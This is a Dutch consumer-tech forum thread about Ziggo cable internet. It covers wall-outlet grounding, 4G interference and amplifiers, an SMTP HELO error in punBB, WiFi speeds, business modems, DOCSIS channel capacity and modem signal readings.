Thousands of years ago, cats were worshipped as Gods. Cats have never forgotten this.
Het is wel beter om te aarden. De spanning kan weg en je krijgt een beter signaal (correctables, uncorrectables gaat omlaag)DaveD1109 schreef op donderdag 09 april 2015 @ 07:32:
Bij mij is een aantal weken terug ziggo geïnstalleerd door een monteur. Hij heeft een nieuwe wandcontactdoos geïnstalleerd, echter als ik een connector aanraak daarvan dan voel ik dat daar aardig wat spanning op staat. Horen die dingen niet geaard te worden? Heb namelijk nog dat groen/gele kabeltje liggen die bij het installatiepakket zat.
Dan ga ik er zelf maar ff naar kijken zo. Normaal installeerde ik zelf en liet het nu doen omdat het gratis was. Gratizzz niet altijd goed!!Gogol schreef op donderdag 09 april 2015 @ 08:16:
[...]
Het is wel beter om te aarden. De spanning kan weg en je krijgt een beter signaal (correctables, uncorrectables gaat omlaag)
Edit: Zie net ook dat die monteur het schroefje waarmee je de groene kabel in de wandcontactdoos klemt heeft doorgedraaid. De kabel zit er dus niet vast in. Ga nu maar een nieuwe wandcontactdoos bestellen, maar welke is het beste??
Heb al 4g storingsvrije bekabeling liggen van hirschman dus wil nu ook een goede wandcontactdoos.
[ Voor 30% gewijzigd door DaveD1109 op 09-04-2015 09:25 ]
DaveD
[ Voor 17% gewijzigd door Koekenbakkertje op 09-04-2015 09:29 ]
Aarding wordt alleen toegepast op AOP's die in de meterkast zitten. Het hoeft niet voor AOP's die in de woonkamer zitten. Je kan wel zelf aarden, maar dan moet je wel de mogelijkheid hebben.DaveD1109 schreef op donderdag 09 april 2015 @ 07:32:
Bij mij is een aantal weken terug ziggo geïnstalleerd door een monteur. Hij heeft een nieuwe wandcontactdoos geïnstalleerd, echter als ik een connector aanraak daarvan dan voel ik dat daar aardig wat spanning op staat. Horen die dingen niet geaard te worden? Heb namelijk nog dat groen/gele kabeltje liggen die bij het installatiepakket zat.
Over het hoe en waaraan bestaan veel discussies. In principe wordt een "schone" aarde voorgeschreven. Dat zou betekenen dat je het AOP aan een eigen aardpin moet leggen.
Hirschmann / Technetix DIO-01 is de standaard. Goed afgeschermd tegen 4G instraling.DaveD1109 schreef op donderdag 09 april 2015 @ 08:39:
[...]
Dan ga ik er zelf maar ff naar kijken zo. Normaal installeerde ik zelf en liet het nu doen omdat het gratis was. Gratizzz niet altijd goed!!
Edit: Zie net ook dat die monteur het schroefje waarmee je de groene kabel in de wandcontactdoos klemt heeft doorgedraaid. De kabel zit er dus niet vast in. Ga nu maar een nieuwe wandcontactdoos bestellen, maar welke is het beste??
Heb al 4g storingsvrije bekabeling liggen van hirschman dus wil nu ook een goede wandcontactdoos.
Niet zelf kopen, maar Ziggo bellen, dan sturen ze hem op.
Je krijgt dan normaalgesproken de combi DIO-01 met UMU1006/T verdeler. Of nogmaals monteur laten komen en hem de nieuwe doos laten installeren.
Bij mijn vorige modem (Arris) werkte dit altijd perfect..
Beauty is in the eye of the beerholder
Oke top!!Masimo schreef op donderdag 09 april 2015 @ 13:13:
[...]
Hirschmann / Technetix DIO-01 is de standaard. Goed afgeschermd tegen 4G instraling.
Niet zelf kopen, maar Ziggo bellen, dan sturen ze hem op.
Je krijgt dan normaalgesproken de combi DIO-01 met UMU1006/T verdeler. Of nogmaals monteur laten komen en hem de nieuwe doos laten installeren.
DaveD
Mag ik misschien vragen hoe je dit voor elkaar hebt gekregen?menalert schreef op dinsdag 24 maart 2015 @ 20:54:
Die FRA-752 dus gratis van ziggo ontvangen vorige week na een telefoontje.
Ik ben een nieuwe klant bij Ziggo. Vorige week is bij mij de monteur langs geweest om alles te installeren. Gisteren werd ik door een medewerker van Ziggo gebeld, welke vroeg hoe de installatie verlopen was. Ik heb toen gevraagd of ik ook in aanmerking zou kunnen komen voor zo'n versterker. De desbetreffende medewerker heeft hier toen een aantekening van gemaakt en gezegd dat ik vandaag met de klantenservice contact op moest nemen om te vragen of dit mogelijk was.
Toen ik vandaag belde, werd ik na het uitleggen van mijn verhaal doorverbonden met een andere medewerker. Deze vertelde mij, na mijn verhaal aangehoord te hebben, dat ze mij door zou verbinden met een afdeling, welke mij de versterker zou toesturen. De medewerker van deze afdeling gaf echter weer aan dat de vorige medewerker welke ik gesproken had verkeerd had gecommuniceerd en dat ze deze versterkers alleen toesturen naar gebruikers van een bepaalde ontvanger (ik vermoed dat ze de interactieve ontvanger van Cisco bedoelen) en dat deze ontvangers niet meer uitgegeven worden.
Bij mijn ouders is in het verleden een keer een monteur langs geweest. Deze vertelde mij destijds dat ik bij vragen en problemen het beste bij een Ziggo Studio langs kan gaan. Ik dacht, laat ik daar eens heen gaan, om te vragen hoe dat precies zit met die versterker en waarom ik via de telefoon tegenstrijdige berichten te horen krijg. Toen ik bij de Ziggo Studio aan kwam was deze echter gesloten, terwijl dit niet op de website aangegeven was.
Al met al heb ik dus nog niet zulke goede ervaringen als klant van Ziggo. Wel vond ik het netjes dat ik na de installatie nog even gebeld werd met de vraag hoe deze installatie verlopen was.
Ik heb hier al jaren een dlink dir-655 staan voor mij wifi.
Echter is mijn verbinding met de wifi niet echt vlot.
Ik haal max 51mb terwijl het volgens de specs een doorvoer moet hebben van 130mb.
Iemand een idee waar ik het probleem zou moeten zoeken?
Mijn router heb ik ingesteld dat de apparaten die een wifi-n hebben alleen verbinding mogen maken.
Het heeft niet zozeer met ziggo te maken, maar wist even niet behalve evt een nieuw topic te maken waar ik moest beginnen.
Ik heb op dit moment ziggo 200/20
2250 WP Zuid PVoutput
Verwijderd
Probleempje, sinds kort kan m'n punbb forum geen email versturen, ik kon altijd simpel smtp.ziggo.nl opgeven en werkte prima.
Nu krijg ik: 550 Bad HELO: smtp.ziggo.nl must be you
Zal wel een authenticatie fout zijn. Vroeger ging dat dacht ik puur op ip. Is dit weer iets van de overname en wat kan ik het best doen?
Alvast bedankt.
Kan je een gebruikersnaam <emailadres> en wachtwoord opgeven ?Verwijderd schreef op vrijdag 10 april 2015 @ 17:26:
Hoi,
Probleempje, sinds kort kan m'n punbb forum geen email versturen, ik kon altijd simpel smtp.ziggo.nl opgeven en werkte prima.
Zal wel een authenticatie fout zijn. Vroeger ging dat dacht ik puur op ip. Is dit weer iets van de overname en wat kan ik het best doen?
Alvast bedankt.
Zo ja, dan moet je dit even invullen
2250 WP Zuid PVoutput
Verwijderd
Waarom een nieuwe versterker? Hij heeft het neem ik aan toch werkend achter gelaten?Pazzie schreef op vrijdag 10 april 2015 @ 16:49:
[...]
Mag ik misschien vragen hoe je dit voor elkaar hebt gekregen?
Ik ben een nieuwe klant bij Ziggo. Vorige week is bij mij de monteur langs geweest om alles te installeren. Gisteren werd ik door een medewerker van Ziggo gebeld, welke vroeg hoe de installatie verlopen was. Ik heb toen gevraagd of ik ook in aanmerking zou kunnen komen voor zo'n versterker. De desbetreffende medewerker heeft hier toen een aantekening van gemaakt en gezegd dat ik vandaag met de klantenservice contact op moest nemen om te vragen of dit mogelijk was.
Toen ik vandaag belde, werd ik na het uitleggen van mijn verhaal doorverbonden met een andere medewerker. Deze vertelde mij, na mijn verhaal aangehoord te hebben, dat ze mij door zou verbinden met een afdeling, welke mij de versterker zou toesturen. De medewerker van deze afdeling gaf echter weer aan dat de vorige medewerker welke ik gesproken had verkeerd had gecommuniceerd en dat ze deze versterkers alleen toesturen naar gebruikers van een bepaalde ontvanger (ik vermoed dat ze de interactieve ontvanger van Cisco bedoelen) en dat deze ontvangers niet meer uitgegeven worden.
Bij mijn ouders is in het verleden een keer een monteur langs geweest. Deze vertelde mij destijds dat ik bij vragen en problemen het beste bij een Ziggo Studio langs kan gaan. Ik dacht, laat ik daar eens heen gaan, om te vragen hoe dat precies zit met die versterker en waarom ik via de telefoon tegenstrijdige berichten te horen krijg. Toen ik bij de Ziggo Studio aan kwam was deze echter gesloten, terwijl dit niet op de website aangegeven was.
Al met al heb ik dus nog niet zulke goede ervaringen als klant van Ziggo. Wel vond ik het netjes dat ik na de installatie nog even gebeld werd met de vraag hoe deze installatie verlopen was.
Er is iets in de HELO (of mogelijk EHLO) waar de server over valt. Logische vraag, hoe ziet die HELO er precies uit?Verwijderd schreef op vrijdag 10 april 2015 @ 17:26:
Er moet momenteel nog het een en ander aan het appartement gebeuren. Ik heb hier twee weken geleden de sleutels van ontvangen. Er staan nog geen meubels in en er is veel stof aanwezig. Voor de installatie heb ik in het appartement tijdelijk één televisie geplaatst en deze werkte inderdaad na de installatie ook (met een coaxkabel van een meter).MediaZoo schreef op vrijdag 10 april 2015 @ 18:01:
[...]
Waarom een nieuwe versterker? Hij heeft het neem ik aan toch werkend achter gelaten?
Uiteindelijk worden er meerdere televisies aangesloten en moet het signaal dus gesplitst worden. Ook is de afstand dan langer dan een meter.
Bij mijn ouders zijn er veel problemen geweest met de ontvangst van National Geographic en zenders van dezelfde eigenaar. Dit omdat er in de buurt 4G-masten geplaatst waren. Er is een monteur langsgeweest en deze gaf aan dat het signaal bij het AOP (welke in de huiskamer gesitueerd is) wel goed was, maar dat de 4G-masten vermoedelijk de verstoringen veroorzaakten. De kabels waren/zijn wel van goede kwaliteit (Hirschman KOKA 799, Kabel Keur Certified). De monteur adviseerde daarom om een versterker aan te schaffen, wat inderdaad tegen de verstoringen hielp.
Omdat het appartement op nog geen kilometer afstand bij mijn ouders vandaag ligt (met de 4G-masten daar tussen), leek het mij verstandig om KOKA 9 TS kabels aan te gaan leggen en om dan ook maar gelijk een versterker aan te sluiten.
Ik heb de website van UPC (Ook Liberty Global) bekeken en daar wordt ook vermeld:
- "Wilt u meer dan 2 tv-toestellen aansluiten, of gebruikt u in totaal meer dan 15 meter coaxkabel? Dan gebruikt u een versterker."
Ook staat er in de handleiding van de FRA-752 (https://www.upc.nl/pdf/upc-handleiding-versterker-fra752.pdf) bijvoorbeeld:
" Heeft u alle digitale diensten
van UPC en maakt u gebruik van meerdere tv’s, dan adviseren we u het signaal te versterken voor beter beeld en geluid.".
Verder heb ik gelezen dat er na het gebruik van de nieuwe frequenties alleen maar meer klachten m.b.t. tot de 4G-masten zijn gekomen.
Een versterker zal nooit storing door een 4G mast oplossen. Hoogstens verergeren.Pazzie schreef op vrijdag 10 april 2015 @ 18:46:
[...]
Er moet momenteel nog het een en ander aan het appartement gebeuren. Ik heb hier twee weken geleden de sleutels van ontvangen. Er staan nog geen meubels in en er is veel stof aanwezig. Voor de installatie heb ik in het appartement tijdelijk één televisie geplaatst en deze werkte inderdaad na de installatie ook (met een coaxkabel van een meter).
Uiteindelijk worden er meerdere televisies aangesloten en moet het signaal dus gesplitst worden. Ook is de afstand dan langer dan een meter.
Bij mijn ouders zijn er veel problemen geweest met de ontvangst van National Geographic en zenders van dezelfde eigenaar. Dit omdat er in de buurt 4G-masten geplaatst waren. Er is een monteur langsgeweest en deze gaf aan dat het signaal bij het AOP (welke in de huiskamer gesitueerd is) wel goed was, maar dat de 4G-masten vermoedelijk de verstoringen veroorzaakten. De kabels waren/zijn wel van goede kwaliteit (Hirschman KOKA 799, Kabel Keur Certified). De monteur adviseerde daarom om een versterker aan te schaffen, wat inderdaad tegen de verstoringen hielp.
Omdat het appartement op nog geen kilometer afstand bij mijn ouders vandaag ligt (met de 4G-masten daar tussen), leek het mij verstandig om KOKA 9 TS kabels aan te leggen en om dan ook maar gelijk een versterker aan te sluiten.
Ik heb de website van UPC (Ook Liberty Global) bekeken en daar wordt ook vermeld:
- "Wilt u meer dan 2 tv-toestellen aansluiten, of gebruikt u in totaal meer dan 15 meter coaxkabel? Dan gebruikt u een versterker."
Ook staat er in de handleiding van de FRA-752 (https://www.upc.nl/pdf/upc-handleiding-versterker-fra752.pdf) bijvoorbeeld:
" Heeft u alle digitale diensten
van UPC en maakt u gebruik van meerdere tv’s, dan adviseren we u het signaal te versterken voor beter beeld en geluid.".
Verder heb ik gelezen dat er na het gebruik van de nieuwe frequenties alleen maar meer klachten m.b.t. tot de 4G-masten zijn gekomen.
Interferentie door 4G,Digitenne,enz voorkom je met goede spullen. KOKA799 en KOKA 9TS zijn hiervoor op dit moment voldoende. Als de monteur beweert dat een versterker problemen door 4G voorkomt, ontstaat er bij mij twijfel over zijn kunde.
De reden die aangehaald wordt met meerdere aansluitingen in huis. Dan is het een logisch een versterker te gebruiken. Dat is ook zeer zeker een goed advies.
Verwijderd
Heb ik geprobeerd maar krijg dezelfde melding.MdO82 schreef op vrijdag 10 april 2015 @ 17:29:
[...]
Kan je een gebruikersnaam <emailadres> en wachtwoord opgeven ?
Zo ja, dan moet je dit even invullen
Goeie vraag. Hoe krijg ik die te pakken? Forum in debug mode zetten had ik niks aan bv. Log file ergens?Er is iets in de HELO (of mogelijk EHLO) waar de server over valt. Logische vraag, hoe ziet die HELO er precies uit?
Bedankt voor je reactie.MediaZoo schreef op vrijdag 10 april 2015 @ 18:53:
[...]
Een versterker zal nooit storing door een 4G mast oplossen. Hoogstens verergeren.
Interferentie door 4G,Digitenne,enz voorkom je met goede spullen. KOKA799 en KOKA 9TS zijn hiervoor op dit moment voldoende. Als de monteur beweert dat een versterker problemen door 4G voorkomt, ontstaat er bij mij twijfel over zijn kunde.
De reden die aangehaald wordt met meerdere aansluitingen in huis. Dan is het een logisch een versterker te gebruiken. Dat is ook zeer zeker een goed advies.
Bij mijn ouders zijn ook meerdere aansluitingen aanwezig in huis. In plaats van de versterker, waren er op dat moment splitters aanwezig van waarschijnlijk een minder goede kwaliteit. Het advies van de monteur kan ik daarom wel begrijpen en heeft ook het probleem opgelost.
Op jouw website lees ik ook bij een splitter: "Wilt u kabels langer dan 5 meter gebruiken? Dan raden wij u aan een versterker te gebruiken.".
Mijn conclusie is dus dat ik nog steeds een versterker nodig heb, maar dat ik deze zelf mag gaan bekostigen. Daarom was ik benieuwd waarom het menalert wel gelukt was om met een telefoontje naar Ziggo een gratis versterker te ontvangen en vind ik het jammer dat mij deze eerst wel toegezegd was, maar dat er later verteld werd dat deze alleen bij een bepaalde ontvanger verstrekt werden.
Verder niet zo'n heel groot probleem. Dan schaf ik er zelf wel één aan (er staan er ook veel op Marktplaats las ik in dit topic). Ik zal in ieder geval jouw website even onthouden, m.b.t. de kabels en connectoren
Even gezocht in de broncode. punBB stuurt een HELO met als argument de server waar hij mee verbindt: dus HELO smtp.ziggo.nl. Dat is natuurlijk niet de bedoeling, want in de HELO stel je jezelf voor. Je zult wat moeten aanpassen in include/email.php zodat hij wat anders meegeeft, maakt niet uit wat als het maar geen smtp.ziggo.nl is.Verwijderd schreef op vrijdag 10 april 2015 @ 19:52:
Goeie vraag. Hoe krijg ik die te pakken? Forum in debug mode zetten had ik niks aan bv. Log file ergens?
De uiteindelijke doorvoer snelheid hangt van vele factoren af. Een aantal belangrijke:MdO82 schreef op vrijdag 10 april 2015 @ 17:15:
Ik zit met het volgende en heb even geen idee waar ik moet beginnen al heeft het niet echt iets met ziggo te maken
Ik heb hier al jaren een dlink dir-655 staan voor mij wifi.
Echter is mijn verbinding met de wifi niet echt vlot.
Ik haal max 51mb terwijl het volgens de specs een doorvoer moet hebben van 130mb.
Iemand een idee waar ik het probleem zou moeten zoeken?
Mijn router heb ik ingesteld dat de apparaten die een wifi-n hebben alleen verbinding mogen maken.
Het heeft niet zozeer met ziggo te maken, maar wist even niet behalve evt een nieuw topic te maken waar ik moest beginnen.
Ik heb op dit moment ziggo 200/20
- Bouwmaterialen
- Plaatsing van de router
- Naburige netwerken op de 2,4GHz frequentieband
- Wifi-adapters van de ontvangende apparaten
Met wifi-n ga je de 200 Mbps sowieso nooit halen. 90-100 Mbps is de max.
Je DLink DIR 655 doet maximaal 75 Mbps onder ideale omstandigheden (Bron: Smallnetbuilder)
[ Voor 6% gewijzigd door Masimo op 10-04-2015 21:00 ]
Verwijderd
Wel vreemd want ik heb in punbb altijd alleen maar smtp.ziggo.nl als server adres hoeven op te geven.
De error komt trouwens van de function server_parse($socket, $expected_response)
Ik kan me niet herinneren dat ik iets heb aangepast ofzo dus ik tast nog even in het duister. Morgen nog maar eens kijken.
hcQd schreef op vrijdag 10 april 2015 @ 20:08:
[...]
Even gezocht in de broncode. punBB stuurt een HELO met als argument de server waar hij mee verbindt: dus HELO smtp.ziggo.nl. Dat is natuurlijk niet de bedoeling, want in de HELO stel je jezelf voor. Je zult wat moeten aanpassen in include/email.php zodat hij wat anders meegeeft, maakt niet uit wat als het maar geen smtp.ziggo.nl is.
Ik ga er eens verder in duiken.Masimo schreef op vrijdag 10 april 2015 @ 20:57:
[...]
De uiteindelijke doorvoer snelheid hangt van vele factoren af. Een aantal belangrijke:Er zijn al talloze topics over volgeschreven, dus voorlopig heb je genoeg te lezen.
- Bouwmaterialen
- Plaatsing van de router
- Naburige netwerken op de 2,4GHz frequentieband
- Wifi-adapters van de ontvangende apparaten
Met wifi-n ga je de 200 Mbps sowieso nooit halen.
Je DLink DIR 655 doet maximaal 75 Mbps onder ideale omstandigheden (Bron: Smallnetbuilder)
Bedankt voor je reactie
Kan natuurlijk een 5ghz router halen, maar sommige apparaten kunnen dat nog niet aan.
Voorlopig blijft het zo.
En idd de max van 200 ga je inderdaad niet halen daar was ik mij al bewust van.
2250 WP Zuid PVoutput
Daar is dan ook simultaneous dual band voor uit gevonden... 2.4&5 uit 1 apparaatMdO82 schreef op vrijdag 10 april 2015 @ 21:01:
[...]
Ik ga er eens verder in duiken.
Bedankt voor je reactie
Kan natuurlijk een 5ghz router halen, maar sommige apparaten kunnen dat nog niet aan.
Voorlopig blijft het zo.
En idd de max van 200 ga je inderdaad niet halen daar was ik mij al bewust van.
Maar of er tegenwoordig nog een bridge modem beschikbaar is de huidige internetsnelheden aan kan weet ik niet.
[ Voor 63% gewijzigd door job op 11-04-2015 09:58 ]
Bedankt!job schreef op zaterdag 11 april 2015 @ 09:53:
Voorheen was het bij ziggo zakelijk altijd een ubee bridge modem en een juniper srx100.
Maar of er tegenwoordig nog een bridge modem beschikbaar is de huidige internetsnelheden aan kan weet ik niet.
Hoe zit/zat bij office basis weet ik niet.
Bel ze anders eens op. De helpdesk voor zakelijke klanten is veel openener met hun informatie dan de consumenten variant.
[ Voor 25% gewijzigd door job op 11-04-2015 10:09 ]
Ja ik heb de router al opgezocht en Ziggo ''bewaakt'' die router 24/7, daarom is deze helemaal dicht getimmerd zodat mensen er niet zelf erin gaan knoeien.job schreef op zaterdag 11 april 2015 @ 10:07:
Dat sloeg dan wel op het zakelijk plus abonnement (omdat je daar meerdere ip's bij krijgt), en de router die je krijgt is dichtgetimmerd.
Bel ze anders eens op. De helpdesk voor zakelijke klanten is veel openener met hun informatie dan de consumenten variant.
Heeft er iemand ook ervaring met die zakelijke router?
Elke poort op deze router geeft een wan ip.. en that's it. Je zult dus zelf moeten zorgen voor een firewall, of een nat-router om een intern netwerk aan te leggen.
Maar zoals ik ook eerder zei. Vraag na welk modem en router je krijgt bij het abonnement wat jij op het oog hebt. Bel gewoon met ziggo zakelijk voor meer informatie.
[ Voor 27% gewijzigd door job op 11-04-2015 11:25 ]
Ja dat ga ik zeker doen, maar je krijgt ook zoziezo een Ubee/Cisco modem van Ziggo.job schreef op zaterdag 11 april 2015 @ 10:24:
Verwar overigens niet een thuis router, met een zakelijke router zoals deze.
Elke poort op deze router geeft een wan ip.. en that's it. Je zult dus zelf moeten zorgen voor een firewall, of een nat-router om een intern netwerk aan te leggen.
Maar zoals ik ook eerder zei. Vraag na welk modem en router je krijgt bij het abonnement wat jij op het oog hebt. Bel gewoon met ziggo zakelijk voor meer informatie.
Office Basis klanten krijgen hetzelfde modem als bij een gewoon Alles-in-1 abonnement, namelijk een Cisco 3928, Ubee EVW321B of een Technicolor TC7210.job schreef op zaterdag 11 april 2015 @ 10:07:
Dat sloeg dan wel op het zakelijk plus abonnement (omdat je daar meerdere ip's bij krijgt), en de router die je krijgt is dichtgetimmerd.
Office/Internet Plus klanten krijgen een Ubee of Cisco modem-only modem (EVM320B of EPC3008 uit mn hoofd), met hierachter een Juniper router.
Geen idee waarom Ziggo nog steeds kiest voor 40 up, maar goed. Had liever een 200/100 gezien ipv 500/40.
[ Voor 16% gewijzigd door tcviper op 11-04-2015 12:56 ]
PSN: tcviper | Steam: Viper | TechConnect - MikeRedfields
Zou de lage up niet gewoon komen door de bandbreedte die men er niet voor heeft ?tcviper schreef op zaterdag 11 april 2015 @ 12:55:
Bij Internet plus Extra zakelijk zit geen Juniper, men dient zelf een eigen router te verzorgen achter het Cisco EPC3008 modem. Overigens kregen de Ziggo partners de informatie dat althans zakelijk de pakketten omgegooid gaan worden per Mei. Het hoogste word dalijk 500/40.
Geen idee waarom Ziggo nog steeds kiest voor 40 up, maar goed. Had liever een 200/100 gezien ipv 500/40.
Zoals bij particuliere klanten hebben ze 8 kanalen voor de download en 4 voor de up.
Wellicht kunnen ze inderdaad 200/100 bieden maar hoe zit het dan met de kanalen.
Hebben ze geen 8 kanalen nodig voor de download ?
Zie overigens dat mijn Correctable en Uncorrectable FEC omhoog schieten hoor, geen idee wat er loos is
2250 WP Zuid PVoutput
Dat is toch niet zo moeilijk te bedenken? Ziggo heeft 4 upstream kanalen per coaxsegment die bij 64-QAM modulatie en een symbolrate van 5120 in theorie een capaciteit hebben van 28 Mbps. Gebundeld wordt dat dus in theorie een capaciteit van 4 * 28 Mbps = 112 Mbps. In theorie, want in tegenstelling tot de Internet downstream is er geen sprake van een constante data stream die door de modulator naar alle klanten in het coaxsegment worden gezonden. Door het gelijktijdig gebruik in een coaxsegment is er nogal wat aan administratieve overhead nodig om de zenders in de kabelmodems om de beurt te laten zenden waarbij ook andere modulatie types worden gebruik met een lagere capaciteit.tcviper schreef op zaterdag 11 april 2015 @ 12:55:
Een aanduiding dat je last hebt van signaal problemen.MdO82 schreef op zaterdag 11 april 2015 @ 13:17:
[...]
Zie overigens dat mijn Correctable en Uncorrectable FEC omhoog schieten hoor, geen idee wat er loos is
Dat kan wel zo zijn maar een download boost van 200 -> 500 kost toch ook kanalen? Misschien dat ze dan die 4 upstream kanalen es moeten verhogen naar 8 of 16?ArChie schreef op zaterdag 11 april 2015 @ 13:33:
[...]
Dat is toch niet zo moeilijk te bedenken? Ziggo heeft 4 upstream kanalen per coaxsegment die bij 64-QAM modulatie en een symbolrate van 5120 in theorie een capaciteit hebben van 28 Mbps. Gebundeld wordt dat dus in theorie een capaciteit van 4 * 28 Mbps = 112 Mbps. In theorie, want in tegenstelling tot de Internet downstream is er geen sprake van een constante data stream die door de modulator naar alle klanten in het coaxsegment worden gezonden. Door het gelijktijdig gebruik in een coaxsegment is er nogal wat aan administratieve overhead nodig om de zenders in de kabelmodems om de beurt te laten zenden waarbij ook andere modulatie types worden gebruik met een lagere capaciteit.
Docsis 3.1 ondersteunt downstream- en upstreamsnelheden van respectievelijk 10Gbit/s en 1Gbit/s.
Tijd dus om over te gaan daarop.
[ Voor 13% gewijzigd door tcviper op 11-04-2015 13:48 ]
PSN: tcviper | Steam: Viper | TechConnect - MikeRedfields
Voor de huidige EuroDOCSIS 3.0 standaard is het frequentie gebied van 5 tot 65 MHz beschikbaar voor upstream kanalen. Een upstream kanaal met een symbolrate van 5210 heeft een bandbreedte van 6.4 MHz, dus 60 gedeeld door 6.4 is maximaal 9 upstream kanalen. En volgens het TNO rapport dat uitgebracht is in opdracht van NLkabel, de branchvereniging van de Nederlandse kabelbedrijven, is de frequentieband van 5 tot 20 MHz eigenlijk niet bruikbaar vanwege ruis. Dus 45 gedeeld door 6.4 is maximaal 7 upstream kanalen.tcviper schreef op zaterdag 11 april 2015 @ 13:47:
Dat kan wel zo zijn maar een download boost van 200 -> 500 kost toch ook kanalen? Misschien dat ze dan die 4 upstream kanalen es moeten verhogen naar 8 of 16?
De implementatie van DOCSIS 3.1 vraagt iets meer moeite dan alleen maar roepen dat ze DOCSIS 3.1 gaan toepassen.Volgens Docsis 3.1 moet er tot een gig overheen kunnen gaan: nieuws: Docsis 3.1-modems met downstream van 4Gbit/s worden in 2015 verwacht
Docsis 3.1 ondersteunt downstream- en upstreamsnelheden van respectievelijk 10Gbit/s en 1Gbit/s.
Tijd dus om over te gaan daarop.
Mooie uitleg! Maar hoe zit het dan voor de download? Hoe gaan ze daar van 200 naar 500. Ik neem aan dat ook niet een kwestie is van een paar kanalen aanzetten die ze jarenlang al hadden maar uit hadden staanArChie schreef op zaterdag 11 april 2015 @ 13:58:
[...]
Voor de huidige EuroDOCSIS 3.0 standaard is het frequentie gebied van 5 tot 65 MHz beschikbaar voor upstream kanalen.
[...]
Zijn spaties in de aanbieding ofzo? www.spatiegebruik.nl
Zou ik inderdaad ook denken, maar heb verder nergens last vanArChie schreef op zaterdag 11 april 2015 @ 13:35:
[...]
Een aanduiding dat je last hebt van signaal problemen.
2250 WP Zuid PVoutput
Deze waarden zeggen iets over het foutvrij binnenkomen dan de DOCSIS data pakketjes. Als die niet te herstellen zijn, dan hangt het er maar vanaf welke DOCSIS pakketjes er geraakt worden. Zijn dat payload pakketjes met jouw TCP data dan zal er ongetwijfeld een resend volgen omdat je toepassing niet alles heeft binnen gekregen. Dat leidt wel tot meer onnodig capaciteitsgebruik in het coaxsegment. Vervelender wordt het als de geraakte DOCSIS pakketjes bijvoorbeeld de door de CMTS verzonden management request reponses bevatten die dan niet binnenkomen en je kabelmodem na een aantal retries besluit om een reset te gaan doen. Dit zie je aan oplopende T3/T4 waarden.MdO82 schreef op zaterdag 11 april 2015 @ 14:08:
Zou ik inderdaad ook denken, maar heb verder nergens last van
Momenteel heeft voormalig Ziggo 16 Internet downstreams per coaxsegment. Elke Internet downstream heeft een capaciteit van ongeveer 51 Mbps. Dus 51 * 16 = 816 Mbps. Ofwel 500 past, maar ik denk niet dat de andere gelijktijdige internetters in hetzelfde coaxsegment daar vrolijk van worden. Uiteraard is bij de downstreams geen sprake van een vrij klein frequentiegebied, maar ook hier geldt dat Ziggo eerst ruimte (per downstream 8 MHz) voor zal moeten creëren in de huidige frequentieplannen van de coaxsegmenten en uiteraard de apparatuur moet hebben die meer downstreams aankunnen.fsfikke schreef op zaterdag 11 april 2015 @ 14:03:
Mooie uitleg! Maar hoe zit het dan voor de download? Hoe gaan ze daar van 200 naar 500. Ik neem aan dat ook niet een kwestie is van een paar kanalen aanzetten die ze jarenlang al hadden maar uit hadden staan
het betreft een Cisco modem, afgelopen winter is er een nieuwe coaxkabel in de woning gelegd omdat de oude zeer slecht was dit heeft wel het signaal verbeterd (vooral Tv) maar de internetverbinding blijft wat onstabiel.
waardoor verlopen de docsis waarden?
Verwijderd
Wat voor Cisco modem?Reloader schreef op zaterdag 11 april 2015 @ 14:36:
even een vraagje betreffende docsis waarden, is het normaal dat deze verlopen? ik heb namelijk het idee dat ze bij mijn verbinding heel stabiel zijn echter zit ik nu bij een kennis en het valt me op dat ze wat verlopen. daarnaast klaagt hij ook van een niet echt stabiele verbinding (zo af en toe is het IP adres weg uit het modem en dan na een paar tellen komt dat weer terug)
het betreft een Cisco modem, afgelopen winter is er een nieuwe coaxkabel in de woning gelegd omdat de oude zeer slecht was dit heeft wel het signaal verbeterd (vooral Tv) maar de internetverbinding blijft wat onstabiel.
Kan zijn dat het AOP wat slecht is. Wegvallen van het Cisco modem kan ook nog de firmware als oorzaak hebben. Probeer sowieso UPNP even uit te zetten en draai de modemkabel even aan (aan beide zijden).Reloader schreef op zaterdag 11 april 2015 @ 14:36:
even een vraagje betreffende docsis waarden, is het normaal dat deze verlopen? ik heb namelijk het idee dat ze bij mijn verbinding heel stabiel zijn echter zit ik nu bij een kennis en het valt me op dat ze wat verlopen. daarnaast klaagt hij ook van een niet echt stabiele verbinding (zo af en toe is het IP adres weg uit het modem en dan na een paar tellen komt dat weer terug)
het AOP is nieuw
Dat zegt nog niet zoveel, een nieuw AOP kan ook defect of slecht gemonteerd zijn.Reloader schreef op zaterdag 11 april 2015 @ 14:40:
het AOP is nieuw
Probeer in ieder geval even de modemkabel vast te zetten, dat scheelt misschien al wat.
Verwijderd
Door een firmware update kan de verbinding echt heel erg instabiel zijn, zoals hierboven als is aangegeven zet UPNP eens uit.
1
2
3
4
5
6
7
8
| Channel 1: -2.0 dBmV 40.4 dB Channel 2: -1.9 dBmV 40.4 dB Channel 3: -2.1 dBmV 40.3 dB Channel 4: -2.1 dBmV 40.2 dB Channel 5: -1.8 dBmV 40.3 dB Channel 6: -1.7 dBmV 39.2 dB Channel 7: -1.3 dBmV 40.3 dB Channel 8: -1.1 dBmV 40.3 dB |
af en toe verspringt er een waarde met maximaal .5 dB of .5 Mv
heb echte grote pieken nog niet gezien maar zou niet weten waarom het modem anders over de kop gaat
1
2
3
4
5
6
7
8
9
10
11
12
| Model: Cisco EPC3928AD Vendor: Cisco Hardware Revision: 1.0 Serial Number: 270324123 MAC Address: 08:80:39:d2:8f:ba Bootloader Revision: 2.4.0beta3_R4 Current Software Revision: epc3928a-E10-5-v302r125572-131030c-ZIG Firmware Name: epc3928a-E10-5-v302r125572-131030c-ZIG.bin Firmware Build Time: Oct 30 11:00:08 2013 Cable Modem Status: Operational Wireless Network: Enable System Uptime: 54 days 01h:26m:12s |
UPNP staat al uit:)
[ Voor 27% gewijzigd door Reloader op 11-04-2015 14:47 ]
Verwijderd
Haal je modem eens 10 seconden van het stroom af.Reloader schreef op zaterdag 11 april 2015 @ 14:46:
ik bedoelde meer dat het gemonteerd is door ziggo en dat in principe de signaal waarden mij wel in orde lijken alleen verlopen ze af en toe, nu is het verloop over het laatste half uur
code:
1 2 3 4 5 6 7 8 Channel 1: -2.0 dBmV 40.4 dB Channel 2: -1.9 dBmV 40.4 dB Channel 3: -2.1 dBmV 40.3 dB Channel 4: -2.1 dBmV 40.2 dB Channel 5: -1.8 dBmV 40.3 dB Channel 6: -1.7 dBmV 39.2 dB Channel 7: -1.3 dBmV 40.3 dB Channel 8: -1.1 dBmV 40.3 dB
af en toe verspringt er een waarde met maximaal .5 dB of .5 Mv
